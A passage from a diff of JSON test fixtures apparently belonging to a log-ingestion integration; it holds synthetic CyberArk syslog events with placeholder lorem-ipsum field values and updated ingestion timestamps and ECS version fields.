"%CYBERARK: MessageID=\"276\";aer 1.7744\",ProductAccount=\"iati\",ProductProcess=\"minim\",EventId=\"scipi\",EventClass=\"tur\",EventSeverity=\"very-high\",EventMessage=\"cancel\",ActingUserName=\"Nemoenim\",ActingAddress=\"10.126.205.76\",ActionSourceUser=\"etur\",ActionTargetUser=\"rsitvol\",ActionObject=\"utali\",ActionSafe=\"sed\",ActionLocation=\"xeac\",ActionCategory=\"umdolors\",ActionRequestId=\"lumdo\",ActionReason=\"acom\",ActionExtraDetails=\"eFini\"", "event": { - "ingested": "2021-06-09T10:19:22.411028200Z" + "ingested": "2021-12-14T14:41:55.823573637Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 4 20:44:15 uovol %CYBERARK: MessageID=\"38\";Version=1.3184;Message=accept;Issuer=eufug;Station=10.164.66.154;File=est;Safe=civelits;Location=ici;Category=snulap;RequestId=enimadm;Reason=stenatu;Severity=very-high;SourceUser=sitvo;TargetUser=ine;GatewayStation=10.169.101.161;TicketID=itessequ;PolicyID=iusmodit;UserName=orissu;LogonDomain=fic5107.home;Address=mmodoco2581.www5.host;CPMStatus=isiutali;Port=3575;Database=stquidol;DeviceType=Nemoenim;ExtraDetails=imadmini;", "event": { - "ingested": "2021-06-09T10:19:22.411033Z" + "ingested": "2021-12-14T14:41:55.823574057Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "amvo 2018-06-19 03:46:49.592538723 +0000 UTC tnul6235.www5.lan %CYBERARK: MessageID=\"79\";isau 1.1480\",ProductAccount=\"ihilmole\",ProductProcess=\"saquaea\",EventId=\"ons\",EventClass=\"orsitam\",EventSeverity=\"medium\",EventMessage=\"block\",ActingUserName=\"metco\",ActingAddress=\"10.70.83.200\",ActionSourceUser=\"riame\",ActionTargetUser=\"riat\",ActionObject=\"sseq\",ActionSafe=\"eriam\",ActionLocation=\"pernat\",ActionCategory=\"udan\",ActionRequestId=\"archi\",ActionReason=\"iutaliq\",ActionExtraDetails=\"urQuis\"", "event": { - "ingested": "2021-06-09T10:19:22.411037500Z" + "ingested": "2021-12-14T14:41:55.823574434Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 3 10:49:23 orum %CYBERARK: MessageID=\"53\";Version=1.4887;Message=block;Issuer=madminim;Station=10.207.97.192;File=quio;Safe=eom;Location=teni;Category=ipiscive;RequestId=dant;Reason=etdolor;Severity=high;SourceUser=paria;TargetUser=mmod;GatewayStation=10.134.55.11;TicketID=amqu;PolicyID=lorsitam;UserName=tanimid;LogonDomain=onpr47.api.home;Address=oremqu7663.local;CPMStatus=llumq;Port=5816;Database=tetura;DeviceType=rumet;ExtraDetails=uptasnul;", "event": { - "ingested": "2021-06-09T10:19:22.411041900Z" + "ingested": "2021-12-14T14:41:55.823574871Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018-07-17 17:51:58.112538723 +0000 UTC nde2358.mail.corp %CYBERARK: MessageID=\"75\";Version=1.3601;Message=cancel;Issuer=texplica;Station=10.52.150.104;File=esse;Safe=veniam;Location=edquian;Category=sus;RequestId=imavenia;Reason=expli;Severity=low;SourceUser=orum;TargetUser=oinBCSed;GatewayStation=10.31.187.19;TicketID=ilm;PolicyID=mvel;UserName=eritq;LogonDomain=rehen4859.api.host;Address=eve234.www5.local;CPMStatus=nula;Port=2783;Database=lit;DeviceType=santi;ExtraDetails=ritati;", "event": { - "ingested": "2021-06-09T10:19:22.411046300Z" + "ingested": "2021-12-14T14:41:55.823575488Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dip 2018-08-01 00:54:32.372538723 +0000 UTC idolo5292.local %CYBERARK: MessageID=\"89\";Version=1.3175;Message=allow;Issuer=runtm;Station=10.41.232.147;File=psumd;Safe=oloree;Location=seos;Category=rios;RequestId=labo;Reason=lpaquiof;Severity=high;SourceUser=mcorpo;TargetUser=ntexpl;GatewayStation=10.61.175.217;TicketID=enbyCi;PolicyID=reetdo;UserName=tat;LogonDomain=eufugia4481.corp;Address=fficia2304.www5.home;CPMStatus=vel;Port=2396;Database=rere;DeviceType=pta;ExtraDetails=nonn;", "event": { - "ingested": "2021-06-09T10:19:22.411050800Z" + "ingested": "2021-12-14T14:41:55.823575922Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 15 07:57:06 volup %CYBERARK: MessageID=\"261\";ptate 1.3830\",ProductAccount=\"uisnos\",ProductProcess=\"quamqua\",EventId=\"ntut\",EventClass=\"mag\",EventSeverity=\"very-high\",EventMessage=\"deny\",ActingUserName=\"mini\",ActingAddress=\"10.150.30.95\",ActionSourceUser=\"tur\",ActionTargetUser=\"atnonpr\",ActionObject=\"ita\",ActionSafe=\"amquaer\",ActionLocation=\"aqui\",ActionCategory=\"enby\",ActionRequestId=\"lpa\",ActionReason=\"isn\",ActionExtraDetails=\"smod\"", "event": { - "ingested": "2021-06-09T10:19:22.411055300Z" + "ingested": "2021-12-14T14:41:55.823576310Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 29 14:59:40 siuta %CYBERARK: MessageID=\"66\";atev 1.6626\",ProductAccount=\"CSe\",ProductProcess=\"exerci\",EventId=\"inesciu\",EventClass=\"quid\",EventSeverity=\"high\",EventMessage=\"deny\",ActingUserName=\"onse\",ActingAddress=\"10.98.71.45\",ActionSourceUser=\"destla\",ActionTargetUser=\"fugitse\",ActionObject=\"minimve\",ActionSafe=\"serrorsi\",ActionLocation=\"tametco\",ActionCategory=\"mquisnos\",ActionRequestId=\"lore\",ActionReason=\"isci\",ActionExtraDetails=\"Dui\"", "event": { - "ingested": "2021-06-09T10:19:22.411059800Z" + "ingested": "2021-12-14T14:41:55.823576696Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "lup 2018-09-12 22:02:15.152538723 +0000 UTC iumtotam1010.www5.corp %CYBERARK: MessageID=\"168\";userror 1.5986\",ProductAccount=\"nonn\",ProductProcess=\"hite\",EventId=\"ianonnum\",EventClass=\"nofdeFi\",EventSeverity=\"medium\",EventMessage=\"deny\",ActingUserName=\"remq\",ActingAddress=\"10.252.251.143\",ActionSourceUser=\"velill\",ActionTargetUser=\"rspic\",ActionObject=\"orinrepr\",ActionSafe=\"ror\",ActionLocation=\"onsecte\",ActionCategory=\"doei\",ActionRequestId=\"nvolupta\",ActionReason=\"tev\",ActionExtraDetails=\"nre\"", "event": { - "ingested": "2021-06-09T10:19:22.411082Z" + "ingested": "2021-12-14T14:41:55.823577088Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"274\";lumdolor 1.4706\",ProductAccount=\"eserun\",ProductProcess=\"rvelill\",EventId=\"lupta\",EventClass=\"byC\",EventSeverity=\"high\",EventMessage=\"accept\",ActingUserName=\"uta\",ActingAddress=\"10.197.203.167\",ActionSourceUser=\"ulapa\",ActionTargetUser=\"iumdo\",ActionObject=\"iusmodit\",ActionSafe=\"aturv\",ActionLocation=\"ectetura\",ActionCategory=\"obeataev\",ActionRequestId=\"umf\",ActionReason=\"olesti\",ActionExtraDetails=\"smo\"", "event": { - "ingested": "2021-06-09T10:19:22.411089300Z" + "ingested": "2021-12-14T14:41:55.823577570Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tDuis 2018-10-11 12:07:23.672538723 +0000 UTC iqu1643.www.host %CYBERARK: MessageID=\"96\";inim 1.6806\",ProductAccount=\"ibusBo\",ProductProcess=\"untincu\",EventId=\"tten\",EventClass=\"etur\",EventSeverity=\"low\",EventMessage=\"accept\",ActingUserName=\"enima\",ActingAddress=\"10.187.170.23\",ActionSourceUser=\"sequ\",ActionTargetUser=\"sectetu\",ActionObject=\"evi\",ActionSafe=\"tionula\",ActionLocation=\"accus\",ActionCategory=\"uatu\",ActionRequestId=\"mquis\",ActionReason=\"lab\",ActionExtraDetails=\"uido\"", "event": { - "ingested": "2021-06-09T10:19:22.411095200Z" + "ingested": "2021-12-14T14:41:55.823577996Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018-10-25 19:09:57.932538723 +0000 UTC nimadmin5577.corp %CYBERARK: MessageID=\"61\";Version=1.3824;Message=allow;Issuer=tinculpa;Station=10.123.62.215;File=rumSecti;Safe=riamea;Location=eca;Category=oluptate;RequestId=Duisa;Reason=consequa;Severity=low;SourceUser=iaecon;TargetUser=aevitaed;GatewayStation=10.250.248.215;TicketID=remap;PolicyID=deri;UserName=quaeratv;LogonDomain=involu1450.www.localhost;Address=udexerc2708.api.test;CPMStatus=odic;Port=505;Database=lica;DeviceType=secil;ExtraDetails=uisnos;", "event": { - "ingested": "2021-06-09T10:19:22.411100100Z" + "ingested": "2021-12-14T14:41:55.823578390Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scipit 2018-11-09 02:12:32.192538723 +0000 UTC lloinve551.internal.local %CYBERARK: MessageID=\"372\";Version=1.3759;Message=block;Issuer=isiutali;Station=10.146.57.23;File=evit;Safe=tno;Location=iss;Category=taspe;RequestId=lum;Reason=xerc;Severity=high;GatewayStation=10.147.154.118;TicketID=nvol;PolicyID=enimadmi;UserName=tateveli;LogonDomain=osa3211.www5.example;Address=temvele5776.www.test;CPMStatus=inimve;Port=\"864\";Database=cin;DeviceType=tmo;ExtraDetails=onofdeF;", "event": { - "ingested": "2021-06-09T10:19:22.411104600Z" + "ingested": "2021-12-14T14:41:55.823578776Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "its 2018-11-23 09:15:06.452538723 +0000 UTC uptasnul2751.www5.corp %CYBERARK: MessageID=\"232\";ostrudex 1.4542\",ProductAccount=\"niamqui\",ProductProcess=\"usmodite\",EventId=\"tlabo\",EventClass=\"tatemse\",EventSeverity=\"very-high\",EventMessage=\"cancel\",ActingUserName=\"uamestqu\",ActingAddress=\"10.193.33.201\",ActionSourceUser=\"hender\",ActionTargetUser=\"ptatemU\",ActionObject=\"seq\",ActionSafe=\"rumSe\",ActionLocation=\"tatnonp\",ActionCategory=\"ommo\",ActionRequestId=\"adeser\",ActionReason=\"uasiarc\",ActionExtraDetails=\"doeiu\"", "event": { - "ingested": "2021-06-09T10:19:22.411109500Z" + "ingested": "2021-12-14T14:41:55.823579212Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018-12-07 16:17:40.712538723 +0000 UTC atuserro6791.internal.host %CYBERARK: MessageID=\"24\";upta 1.313\",ProductAccount=\"onnumqua\",ProductProcess=\"quioff\",EventId=\"iuntN\",EventClass=\"ipis\",EventSeverity=\"low\",EventMessage=\"block\",ActingUserName=\"nesci\",ActingAddress=\"10.154.172.82\",ActionSourceUser=\"lorsi\",ActionTargetUser=\"tetura\",ActionObject=\"eeufug\",ActionSafe=\"edutper\",ActionLocation=\"tevelite\",ActionCategory=\"tocca\",ActionRequestId=\"orsitvol\",ActionReason=\"ntor\",ActionExtraDetails=\"oinBCSed\"", "event": { - "ingested": "2021-06-09T10:19:22.411114Z" + "ingested": "2021-12-14T14:41:55.823579653Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"79\";obeatae 1.1886\",ProductAccount=\"midestl\",ProductProcess=\"quatu\",EventId=\"avolu\",EventClass=\"teturad\",EventSeverity=\"very-high\",EventMessage=\"allow\",ActingUserName=\"expl\",ActingAddress=\"10.47.63.70\",ActionSourceUser=\"lup\",ActionTargetUser=\"tpers\",ActionObject=\"orsitv\",ActionSafe=\"temseq\",ActionLocation=\"uisaute\",ActionCategory=\"uun\",ActionRequestId=\"end\",ActionReason=\"odocons\",ActionExtraDetails=\"olu\"", "event": { - "ingested": "2021-06-09T10:19:22.411119600Z" + "ingested": "2021-12-14T14:41:55.823580301Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 5 06:22:49 amn %CYBERARK: MessageID=\"312\";itessequ 1.5170\",ProductAccount=\"fdeFinib\",ProductProcess=\"uip\",EventId=\"ectobea\",EventClass=\"dat\",EventSeverity=\"very-high\",EventMessage=\"block\",ActingUserName=\"turQuis\",ActingAddress=\"10.178.160.245\",ActionSourceUser=\"deomnisi\",ActionTargetUser=\"olupta\",ActionObject=\"oll\",ActionSafe=\"laboree\",ActionLocation=\"udantiu\",ActionCategory=\"itametco\",ActionRequestId=\"iav\",ActionReason=\"odico\",ActionExtraDetails=\"rsint\"", "event": { - "ingested": "2021-06-09T10:19:22.411124300Z" + "ingested": "2021-12-14T14:41:55.823580940Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 19 13:25:23 quiav %CYBERARK: MessageID=\"77\";Version=1.6648;Message=block;Issuer=Nem;Station=10.85.13.237;File=oluptat;Safe=enimad;Location=tis;Category=qua;RequestId=con;Reason=tore;Severity=high;SourceUser=quelaud;TargetUser=luptat;GatewayStation=10.89.154.115;TicketID=oeiusmo;PolicyID=nimv;UserName=emeu;LogonDomain=tatemac5192.www5.test;Address=teursint1321.www5.example;CPMStatus=lamcolab;Port=7024;Database=nturmag;DeviceType=uredol;ExtraDetails=maliqua;", "event": { - "ingested": "2021-06-09T10:19:22.411128600Z" + "ingested": "2021-12-14T14:41:55.823581597Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019-02-02 20:27:57.752538723 +0000 UTC omnisi5530.mail.example %CYBERARK: MessageID=\"308\";Version=1.3387;Message=allow;Issuer=itame;Station=10.222.32.183;File=yCiceroi;Safe=nostrum;Location=orroquis;Category=eumi;RequestId=tvo;Reason=aea;Severity=low;SourceUser=mmo;TargetUser=eve;GatewayStation=10.65.207.234;TicketID=ciad;PolicyID=ugiatqu;UserName=eruntmo;LogonDomain=nimve2787.mail.test;Address=boreet2051.internal.localdomain;CPMStatus=iavo;Port=1644;Database=udexerc;DeviceType=ovolupta;ExtraDetails=volup;", "event": { - "ingested": "2021-06-09T10:19:22.411133100Z" + "ingested": "2021-12-14T14:41:55.823582003Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rro 2019-02-17 03:30:32.012538723 +0000 UTC tuser6944.local %CYBERARK: MessageID=\"54\";iarchite 1.1612\",ProductAccount=\"oinven\",ProductProcess=\"natu\",EventId=\"edqu\",EventClass=\"tationu\",EventSeverity=\"high\",EventMessage=\"cancel\",ActingUserName=\"olore\",ActingAddress=\"10.16.181.60\",ActionSourceUser=\"ameaquei\",ActionTargetUser=\"gnama\",ActionObject=\"esciun\",ActionSafe=\"tesse\",ActionLocation=\"olupta\",ActionCategory=\"isno\",ActionRequestId=\"oluptas\",ActionReason=\"nderiti\",ActionExtraDetails=\"uatu\"", "event": { - "ingested": "2021-06-09T10:19:22.411137300Z" + "ingested": "2021-12-14T14:41:55.823582400Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "orem 2019-03-03 10:33:06.272538723 +0000 UTC giatqu1484.internal.corp %CYBERARK: MessageID=\"208\";oreseosq 1.2275\",ProductAccount=\"uianon\",ProductProcess=\"nul\",EventId=\"onse\",EventClass=\"sitam\",EventSeverity=\"very-high\",EventMessage=\"deny\",ActingUserName=\"illoin\",ActingAddress=\"10.91.213.82\",ActionSourceUser=\"uid\",ActionTargetUser=\"amnis\",ActionObject=\"rvelil\",ActionSafe=\"adese\",ActionLocation=\"olorsi\",ActionCategory=\"caboNemo\",ActionRequestId=\"uptas\",ActionReason=\"temaccus\",ActionExtraDetails=\"ons\"", "event": { - "ingested": "2021-06-09T10:19:22.411141900Z" + "ingested": "2021-12-14T14:41:55.823582792Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019-03-17 17:35:40.532538723 +0000 UTC oreeu3666.invalid %CYBERARK: MessageID=\"48\";tis 1.6724\",ProductAccount=\"eprehe\",ProductProcess=\"tinvolup\",EventId=\"iaeconse\",EventClass=\"uisa\",EventSeverity=\"medium\",EventMessage=\"allow\",ActingUserName=\"tdolo\",ActingAddress=\"10.204.214.98\",ActionSourceUser=\"iumt\",ActionTargetUser=\"porissus\",ActionObject=\"imip\",ActionSafe=\"tsunt\",ActionLocation=\"rnat\",ActionCategory=\"oremi\",ActionRequestId=\"ectobeat\",ActionReason=\"ecte\",ActionExtraDetails=\"abo\"", "event": { - "ingested": "2021-06-09T10:19:22.411146Z" + "ingested": "2021-12-14T14:41:55.823583384Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"219\";snos 1.5910\",ProductAccount=\"moenimip\",ProductProcess=\"uames\",EventId=\"tium\",EventClass=\"ianonn\",EventSeverity=\"very-high\",EventMessage=\"accept\",ActingUserName=\"etc\",ActingAddress=\"10.223.178.192\",ActionSourceUser=\"atquovol\",ActionTargetUser=\"evel\",ActionObject=\"edol\",ActionSafe=\"sequuntu\",ActionLocation=\"quameius\",ActionCategory=\"litse\",ActionRequestId=\"san\",ActionReason=\"apari\",ActionExtraDetails=\"iarchit\"", "event": { - "ingested": "2021-06-09T10:19:22.411150300Z" + "ingested": "2021-12-14T14:41:55.823583771Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019-04-15 07:40:49.052538723 +0000 UTC nsequat6724.www.invalid %CYBERARK: MessageID=\"183\";Version=1.801;Message=cancel;Issuer=ati;Station=10.26.137.126;File=dolor;Safe=Mal;Location=ametcons;Category=tconse;RequestId=eumf;Reason=roquisq;Severity=medium;SourceUser=doconse;TargetUser=audant;GatewayStation=10.26.33.181;TicketID=remeum;PolicyID=mmod;UserName=taevit;LogonDomain=ama6820.mail.example;Address=umto3015.mail.lan;CPMStatus=sitv;Port=4667;Database=com;DeviceType=rep;ExtraDetails=mveni;", "event": { - "ingested": "2021-06-09T10:19:22.411154700Z" + "ingested": "2021-12-14T14:41:55.823584169Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 29 14:43:23 num %CYBERARK: MessageID=\"41\";Version=1.10;Message=accept;Issuer=quaerat;Station=10.148.195.208;File=amnih;Safe=tper;Location=pisciv;Category=tconsect;RequestId=pariat;Reason=iutal;Severity=low;SourceUser=ctobeat;TargetUser=isi;GatewayStation=10.142.161.116;TicketID=eca;PolicyID=ctionofd;UserName=mpori;LogonDomain=olupt966.www5.corp;Address=etquasia1800.www.host;CPMStatus=nimip;Port=7612;Database=squamest;DeviceType=quisn;ExtraDetails=pteu;", "event": { - "ingested": "2021-06-09T10:19:22.411158800Z" + "ingested": "2021-12-14T14:41:55.823584618Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "velillum 2019-05-13 21:45:57.572538723 +0000 UTC ntNequ7639.internal.localdomain %CYBERARK: MessageID=\"270\";Version=1.1026;Message=block;Issuer=itinvo;Station=10.107.24.54;File=emipsumq;Safe=culpaq;Location=quamq;Category=usan;RequestId=tdolo;Reason=ident;Severity=medium;SourceUser=itaedi;TargetUser=hend;GatewayStation=10.10.174.253;TicketID=esciun;PolicyID=tasnul;UserName=uptasn;LogonDomain=lit4112.www.localhost;Address=quisquam2153.mail.host;CPMStatus=dit;Port=2717;Database=lup;DeviceType=aeca;ExtraDetails=isau;", "event": { - "ingested": "2021-06-09T10:19:22.411164Z" + "ingested": "2021-12-14T14:41:55.823585038Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 28 04:48:31 boreetd %CYBERARK: MessageID=\"309\";tNe 1.2566\",ProductAccount=\"eeufug\",ProductProcess=\"ntin\",EventId=\"iades\",EventClass=\"radipis\",EventSeverity=\"very-high\",EventMessage=\"deny\",ActingUserName=\"luptate\",ActingAddress=\"10.87.92.17\",ActionSourceUser=\"utlabore\",ActionTargetUser=\"tamr\",ActionObject=\"serr\",ActionSafe=\"usci\",ActionLocation=\"unturmag\",ActionCategory=\"dexeaco\",ActionRequestId=\"lupta\",ActionReason=\"ura\",ActionExtraDetails=\"oreeufug\"", "event": { - "ingested": "2021-06-09T10:19:22.411169Z" + "ingested": "2021-12-14T14:41:55.823585427Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 11 11:51:06 dolo %CYBERARK: MessageID=\"295\";Version=1.5649;Message=deny;Issuer=Finibus;Station=10.161.51.135;File=porin;Safe=metMal;Location=ciati;Category=ecillum;RequestId=olor;Reason=amei;Severity=medium;SourceUser=quid;TargetUser=accus;GatewayStation=10.231.51.136;TicketID=ctobeat;PolicyID=upta;UserName=asper;LogonDomain=dictasun3408.internal.invalid;Address=secte1774.localhost;CPMStatus=iqui;Port=5200;Database=litani;DeviceType=emp;ExtraDetails=arch;", "event": { - "ingested": "2021-06-09T10:19:22.411174Z" + "ingested": "2021-12-14T14:41:55.823585814Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 25 18:53:40 dipisciv %CYBERARK: MessageID=\"148\";uam 1.2575\",ProductAccount=\"llum\",ProductProcess=\"mwr\",EventId=\"cia\",EventClass=\"idolo\",EventSeverity=\"low\",EventMessage=\"allow\",ActingUserName=\"mquido\",ActingAddress=\"10.51.17.32\",ActionSourceUser=\"ree\",ActionTargetUser=\"itten\",ActionObject=\"quipexea\",ActionSafe=\"orsitv\",ActionLocation=\"dunt\",ActionCategory=\"int\",ActionRequestId=\"ionevo\",ActionReason=\"llitani\",ActionExtraDetails=\"uscipit\"", "event": { - "ingested": "2021-06-09T10:19:22.411184500Z" + "ingested": "2021-12-14T14:41:55.823586263Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "etco 2019-07-10 01:56:14.612538723 +0000 UTC iuntN4077.www.invalid %CYBERARK: MessageID=\"260\";isnostru 1.270\",ProductAccount=\"mmodicon\",ProductProcess=\"eetdo\",EventId=\"mquisno\",EventClass=\"atvolup\",EventSeverity=\"medium\",EventMessage=\"deny\",ActingUserName=\"ollita\",ActingAddress=\"10.108.123.148\",ActionSourceUser=\"cto\",ActionTargetUser=\"cusa\",ActionObject=\"nderi\",ActionSafe=\"tem\",ActionLocation=\"tcu\",ActionCategory=\"eumiu\",ActionRequestId=\"nim\",ActionReason=\"pteurs\",ActionExtraDetails=\"ercitati\"", "event": { - "ingested": "2021-06-09T10:19:22.411189700Z" + "ingested": "2021-12-14T14:41:55.823586648Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 24 08:58:48 eturadip %CYBERARK: MessageID=\"8\";Version=1.425;Message=accept;Issuer=rsitamet;Station=10.114.0.148;File=utod;Safe=olesti;Location=edquia;Category=ihi;RequestId=undeomn;Reason=ape;Severity=medium;SourceUser=amco;TargetUser=ons;GatewayStation=10.198.187.144;TicketID=atquo;PolicyID=borio;UserName=equatD;LogonDomain=uidol6868.mail.localdomain;Address=uido2773.www5.test;CPMStatus=acons;Port=3820;Database=periam;DeviceType=ain;ExtraDetails=umiurer;", "event": { - "ingested": "2021-06-09T10:19:22.411194300Z" + "ingested": "2021-12-14T14:41:55.823587039Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "onorume 2019-08-07 16:01:23.132538723 +0000 UTC abill5290.lan %CYBERARK: MessageID=\"89\";mini 1.7224\",ProductAccount=\"loru\",ProductProcess=\"iadeser\",EventId=\"litess\",EventClass=\"qui\",EventSeverity=\"low\",EventMessage=\"allow\",ActingUserName=\"equa\",ActingAddress=\"10.61.140.120\",ActionSourceUser=\"olorsit\",ActionTargetUser=\"naaliq\",ActionObject=\"plica\",ActionSafe=\"asiarc\",ActionLocation=\"lor\",ActionCategory=\"nvolupt\",ActionRequestId=\"dquia\",ActionReason=\"ora\",ActionExtraDetails=\"umfugiat\"", "event": { - "ingested": "2021-06-09T10:19:22.411198600Z" + "ingested": "2021-12-14T14:41:55.823587426Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"36\";Version=1.6988;Message=deny;Issuer=ite;Station=10.93.24.151;File=Duis;Safe=lupt;Location=quatur;Category=dminim;RequestId=ptatevel;Reason=aperiame;Severity=very-high;SourceUser=eirured;TargetUser=sequamn;GatewayStation=10.149.238.108;TicketID=ciatisun;PolicyID=duntutl;UserName=nven;LogonDomain=ptat4878.lan;Address=quame1852.www.test;CPMStatus=deomni;Port=4512;Database=fugi;DeviceType=nse;ExtraDetails=nesciu;", "event": { - "ingested": "2021-06-09T10:19:22.411202900Z" + "ingested": "2021-12-14T14:41:55.823587917Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 5 06:06:31 inrepreh %CYBERARK: MessageID=\"39\";rit 1.6107\",ProductAccount=\"cipitla\",ProductProcess=\"tlab\",EventId=\"vel\",EventClass=\"ionevo\",EventSeverity=\"high\",EventMessage=\"accept\",ActingUserName=\"uinesc\",ActingAddress=\"10.101.45.225\",ActionSourceUser=\"utla\",ActionTargetUser=\"emi\",ActionObject=\"uaerat\",ActionSafe=\"iduntu\",ActionLocation=\"samvol\",ActionCategory=\"equa\",ActionRequestId=\"apari\",ActionReason=\"tsunt\",ActionExtraDetails=\"caecat\"", "event": { - "ingested": "2021-06-09T10:19:22.411207100Z" + "ingested": "2021-12-14T14:41:55.823588612Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "qui 2019-09-19 13:09:05.912538723 +0000 UTC caboN3124.mail.home %CYBERARK: MessageID=\"8\";catcupid 1.3167\",ProductAccount=\"quela\",ProductProcess=\"uamquaer\",EventId=\"texplica\",EventClass=\"enimi\",EventSeverity=\"low\",EventMessage=\"cancel\",ActingUserName=\"ore\",ActingAddress=\"10.2.204.161\",ActionSourceUser=\"iquamqu\",ActionTargetUser=\"eumfugia\",ActionObject=\"reeufugi\",ActionSafe=\"sequines\",ActionLocation=\"minimve\",ActionCategory=\"texplica\",ActionRequestId=\"entorev\",ActionReason=\"quuntur\",ActionExtraDetails=\"olup\"", "event": { - "ingested": "2021-06-09T10:19:22.411211400Z" + "ingested": "2021-12-14T14:41:55.823589045Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "les 2019-10-03 20:11:40.172538723 +0000 UTC norumet2571.internal.example %CYBERARK: MessageID=\"89\";temp 1.6971\",ProductAccount=\"aliqu\",ProductProcess=\"sequine\",EventId=\"utaliqui\",EventClass=\"isciv\",EventSeverity=\"very-high\",EventMessage=\"cancel\",ActingUserName=\"ptatemse\",ActingAddress=\"10.33.112.100\",ActionSourceUser=\"catcup\",ActionTargetUser=\"enimad\",ActionObject=\"magnaali\",ActionSafe=\"velillum\",ActionLocation=\"ionev\",ActionCategory=\"vitaedi\",ActionRequestId=\"rna\",ActionReason=\"cons\",ActionExtraDetails=\"Except\"", "event": { - "ingested": "2021-06-09T10:19:22.411215600Z" + "ingested": "2021-12-14T14:41:55.823589531Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"95\";Version=1.3175;Message=block;Issuer=neavol;Station=10.94.152.238;File=rporiss;Safe=billoinv;Location=etconse;Category=nesciu;RequestId=mali;Reason=roinBCSe;Severity=very-high;SourceUser=uames;TargetUser=tla;GatewayStation=10.151.110.250;TicketID=psa;PolicyID=nreprehe;UserName=pidatatn;LogonDomain=isno4595.local;Address=lla5407.lan;CPMStatus=upt;Port=4762;Database=itaedict;DeviceType=eroi;ExtraDetails=onemull;", "event": { - "ingested": "2021-06-09T10:19:22.411220Z" + "ingested": "2021-12-14T14:41:55.823589972Z" + 